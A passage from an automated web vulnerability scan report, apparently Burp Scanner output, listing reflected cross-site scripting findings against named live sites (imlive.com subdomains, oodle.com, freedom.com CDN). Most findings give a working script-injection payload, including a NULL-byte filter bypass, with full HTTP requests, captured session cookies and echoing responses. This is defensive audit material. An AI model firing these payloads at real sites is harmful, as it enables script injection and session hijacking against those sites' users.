Cache-Control: max-age=43
Expires: Fri, 28 Jan 2011 16:41:50 GMT
Date: Fri, 28 Jan 2011 16:41:07 GMT
Connection: close
Content-Length: 1928

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=69;var zzPat='8120d";alert(1)//0d14a65187a';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=8120d";alert(1)//0d14a65187a;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


               var zzStr = "s=69;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=" + Math.
...[SNIP]...

4.249. http://cafr.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cafr.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5433f"><script>alert(1)</script>d728cbd751f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?5433f"><script>alert(1)</script>d728cbd751f=1 HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=1caf2e8c-d394-4b4b-8d42-4522f3acd241&sgid=0&tid=0; __utmz=125671448.1296227257.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/12; BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=125671448.1984707985.1296227257.1296227257.1296227257.1; __utmc=125671448; __utmb=125671448.1.10.1296227257; ASP.NET_SessionId=yu2e5055awk4st45vhvswz45;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:06 GMT
Connection: close
Content-Length: 22643


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d
...[SNIP]...
<a class="cafr" title="Fran..ais (Canada)" href="http://cafr.imlive.com/" onclick="dAccess('http://cafr.imlive.com/?5433f"><script>alert(1)</script>d728cbd751f=1');return false;" lang="fr-CA" hreflang="fr-CA">
...[SNIP]...

4.250. http://cafr.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cafr.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d05ee"><script>alert(1)</script>a1533097529 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d05ee"><script>alert(1)</script>a1533097529 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /?%00d05ee"><script>alert(1)</script>a1533097529=1 HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=cewkwz45egz5sj55nckzfefj; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=cewkwz45egz5sj55nckzfefj; path=/; HttpOnly
Set-Cookie: spvdr=vd=60d7fb6d-8833-413b-b606-2c070cf64a07&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:53 GMT; path=/
Set-Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:16:53 GMT
Connection: close
Content-Length: 20012
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||%00d05ee"><script>alert(1)</script>a1533097529~1');return false;">
...[SNIP]...

4.251. http://cafr.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cafr.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b38ec'-alert(1)-'84ce48297e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?b38ec'-alert(1)-'84ce48297e3=1 HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=4g5le3unzktql15523j4vgvl; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=4g5le3unzktql15523j4vgvl; path=/; HttpOnly
Set-Cookie: spvdr=vd=ed834416-472f-4af7-b757-36e07f79cd57&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:54 GMT; path=/
Set-Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:16:54 GMT
Connection: close
Content-Length: 19533
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=cafr.imlive.com&ul=/?b38ec'-alert(1)-'84ce48297e3=1&qs=b38ec'-alert(1)-'84ce48297e3=1&qs=b38ec'-alert(1)-'84ce48297e3=1&iy=dallas&id=44&iu=1&vd=ed834416-472f-4af7-b757-36e07f79cd57';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

4.252. http://cafr.imlive.com/waccess/ [cbname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cafr.imlive.com
Path:   /waccess/

Issue detail

The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd05a"><script>alert(1)</script>cbe3a729d46 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=fd05a"><script>alert(1)</script>cbe3a729d46&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=1caf2e8c-d394-4b4b-8d42-4522f3acd241&sgid=0&tid=0; __utmz=125671448.1296227257.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/12; BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=125671448.1984707985.1296227257.1296227257.1296227257.1; __utmc=125671448; __utmb=125671448.1.10.1296227257; ASP.NET_SessionId=yu2e5055awk4st45vhvswz45;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:00 GMT
Connection: close
Content-Length: 23731


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=fd05a"><script>alert(1)</script>cbe3a729d46&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.253. http://cafr.imlive.com/waccess/ [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cafr.imlive.com
Path:   /waccess/

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8372"><script>alert(1)</script>d63676c4113 was submitted in the from parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=a8372"><script>alert(1)</script>d63676c4113&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=1caf2e8c-d394-4b4b-8d42-4522f3acd241&sgid=0&tid=0; __utmz=125671448.1296227257.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/12; BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=125671448.1984707985.1296227257.1296227257.1296227257.1; __utmc=125671448; __utmb=125671448.1.10.1296227257; ASP.NET_SessionId=yu2e5055awk4st45vhvswz45;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:05 GMT
Connection: close
Content-Length: 23731


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=a8372"><script>alert(1)</script>d63676c4113&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.254. http://cafr.imlive.com/waccess/ [gotopage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cafr.imlive.com
Path:   /waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b90b7'onerror%3d'alert(1)'58d5403e5f1 was submitted in the gotopage parameter. This input was echoed as b90b7'onerror='alert(1)'58d5403e5f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=b90b7'onerror%3d'alert(1)'58d5403e5f1 HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:02 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: icafr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQSQQQDTD=FAMDOIMABGHKKJABIPAJKPBJ; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:03 GMT
Connection: close
Content-Length: 8309
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=cafr.imlive.com&ul=/waccess/b90b7'onerror='alert(1)'58d5403e5f1/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://cafr.imlive.com:80/waccess/b90b7'onerror='alert(1)'58d5403e5f1/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

4.255. http://cafr.imlive.com/waccess/ [promocode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cafr.imlive.com
Path:   /waccess/

Issue detail

The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 980ab"><script>alert(1)</script>eacf27c2ca8 was submitted in the promocode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583980ab"><script>alert(1)</script>eacf27c2ca8&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=1caf2e8c-d394-4b4b-8d42-4522f3acd241&sgid=0&tid=0; __utmz=125671448.1296227257.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/12; BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=125671448.1984707985.1296227257.1296227257.1296227257.1; __utmc=125671448; __utmb=125671448.1.10.1296227257; ASP.NET_SessionId=yu2e5055awk4st45vhvswz45;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:44:56 GMT
Connection: close
Content-Length: 23731


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583980ab"><script>alert(1)</script>eacf27c2ca8&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.256. http://cbs6albany.oodle.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cbs6albany.oodle.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ba1c"><script>alert(1)</script>0fdede783fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?2ba1c"><script>alert(1)</script>0fdede783fa=1 HTTP/1.1
Host: cbs6albany.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Sat, 29 Jan 2011 05:24:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: otu=980e86cbd3ae2db21de9f81835b23291; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: ots=bca0eed19e9a8884cb1df9b5e717aa78; path=/; domain=.oodle.com
Set-Cookie: a=dT1DM0VBNTdFQTRENDNBNDlE; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: multivariate=YToyOntzOjEwOiJjYnM2YWxiYW55IjtzOjEwOiJjYnM2YWxiYW55IjtzOjEwOiJfdGltZXN0YW1wIjtpOjEyOTYyNzg2ODU7fQ%3D%3D; path=/; domain=.oodle.com
Content-Length: 101695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/?2ba1c"><script>alert(1)</script>0fdede783fa=1" />
...[SNIP]...

4.257. http://common.cdn.onset.freedom.com/common/tools/load.php [js parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://common.cdn.onset.freedom.com
Path:   /common/tools/load.php

Issue detail

The value of the js request parameter is copied into the HTML document as plain text between tags. The payload 8e802<script>alert(1)</script>af386fa2d18 was submitted in the js parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/tools/load.php?js=8e802<script>alert(1)</script>af386fa2d18 HTTP/1.1
Host: common.cdn.onset.freedom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:25:25 GMT
Server: Apache
Last-Modified: Sat, 29 Jan 2011 05:25:25 GMT
ETag: "00a3ec14ebd9f96044f83e5dfc16d618-109"
Cache-Control: max-age=86400
Expires: Sun, 30 Jan 2011 05:25:25 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 109
Connection: close
Content-Type: text/javascript

/* http://common.cdn.onset.freedom.com/common/tools/load.php?js=8e802<script>alert(1)</script>af386fa2d18 */

4.258. http://common.cdn.onset.freedom.com/common/tools/load.php [js parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://common.cdn.onset.freedom.com
Path:   /common/tools/load.php

Issue detail

The value of the js request parameter is copied into a JavaScript inline comment. The payload fda89*/alert(1)//e73e572f888 was submitted in the js parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/tools/load.php?js=common_fi_oas,common_dartadsfda89*/alert(1)//e73e572f888 HTTP/1.1
Host: common.cdn.onset.freedom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:25:26 GMT
Server: Apache
Last-Modified: Sat, 29 Jan 2011 05:25:26 GMT
ETag: "8a178484d3c6868d439736284bcc5571-559"
Cache-Control: max-age=86400
Expires: Sun, 30 Jan 2011 05:25:26 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 559
Connection: close
Content-Type: text/javascript

/* http://common.cdn.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartadsfda89*/alert(1)//e73e572f888 */
function getLast(s, num)
   {
   return s.substr(s.length - num, num);
   }


function approveAd(tagpos)
   {
   var last = getLast(location.href, 7);

   if(last.toLowerCase() == "?google")
       {
       if(tagpos ==
...[SNIP]...

4.259. http://common.cdn.onset.freedom.com/common/tools/load.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://common.cdn.onset.freedom.com
Path:   /common/tools/load.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript inline comment. The payload 5b511*/alert(1)//685b93a954a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/tools/load.php?js=common_fi_oas,common_dartads&5b511*/alert(1)//685b93a954a=1 HTTP/1.1
Host: common.cdn.onset.freedom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:25:30 GMT
Server: Apache
Last-Modified: Sat, 29 Jan 2011 05:25:32 GMT
ETag: "e234251c50093aaa4ccfc19dd9d0ec18-19869"
Cache-Control: max-age=86400
Expires: Sun, 30 Jan 2011 05:25:30 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/javascript
Content-Length: 19869

/* http://common.cdn.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads&5b511*/alert(1)//685b93a954a=1 */
function getLast(s, num)
   {
   return s.substr(s.length - num, num);
   }


function approveAd(tagpos)
   {
   var last = getLast(location.href, 7);

   if(last.toLowerCase() == "?google")
       {
       if(tagpos
...[SNIP]...

4.260. http://common.onset.freedom.com/common/tools/load.php [js parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://common.onset.freedom.com
Path:   /common/tools/load.php

Issue detail

The value of the js request parameter is copied into the HTML document as plain text between tags. The payload da001<script>alert(1)</script>2971a6c9080 was submitted in the js parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/tools/load.php?js=da001<script>alert(1)</script>2971a6c9080 HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:59:24 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n23 ( iad-agg-n36), ms iad-agg-n36 ( sfo-agg-n40), ms sfo-agg-n40 ( origin)
ETag: "64016ad15df0065368a6076b7710a50f-109"
Cache-Control: max-age=86400
Expires: Sun, 30 Jan 2011 01:59:25 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Last-Modified: Sat, 29 Jan 2011 01:59:25 GMT
Connection: keep-alive
Content-Length: 109

/* http://common.cdn.onset.freedom.com/common/tools/load.php?js=da001<script>alert(1)</script>2971a6c9080 */

4.261. http://common.onset.freedom.com/common/tools/load.php [js parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://common.onset.freedom.com
Path:   /common/tools/load.php

Issue detail

The value of the js request parameter is copied into a JavaScript inline comment. The payload c74d3*/alert(1)//5adca407e2b was submitted in the js parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/tools/load.php?js=common_fi_oas,common_dartadsc74d3*/alert(1)//5adca407e2b HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:59:28 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n23 ( iad-agg-n22), ms iad-agg-n22 ( sfo-agg-n18), ms sfo-agg-n18 ( origin)
ETag: "0b4514c6e4844bf90b5c34cdfa6ee0ea-559"
Cache-Control: max-age=86400
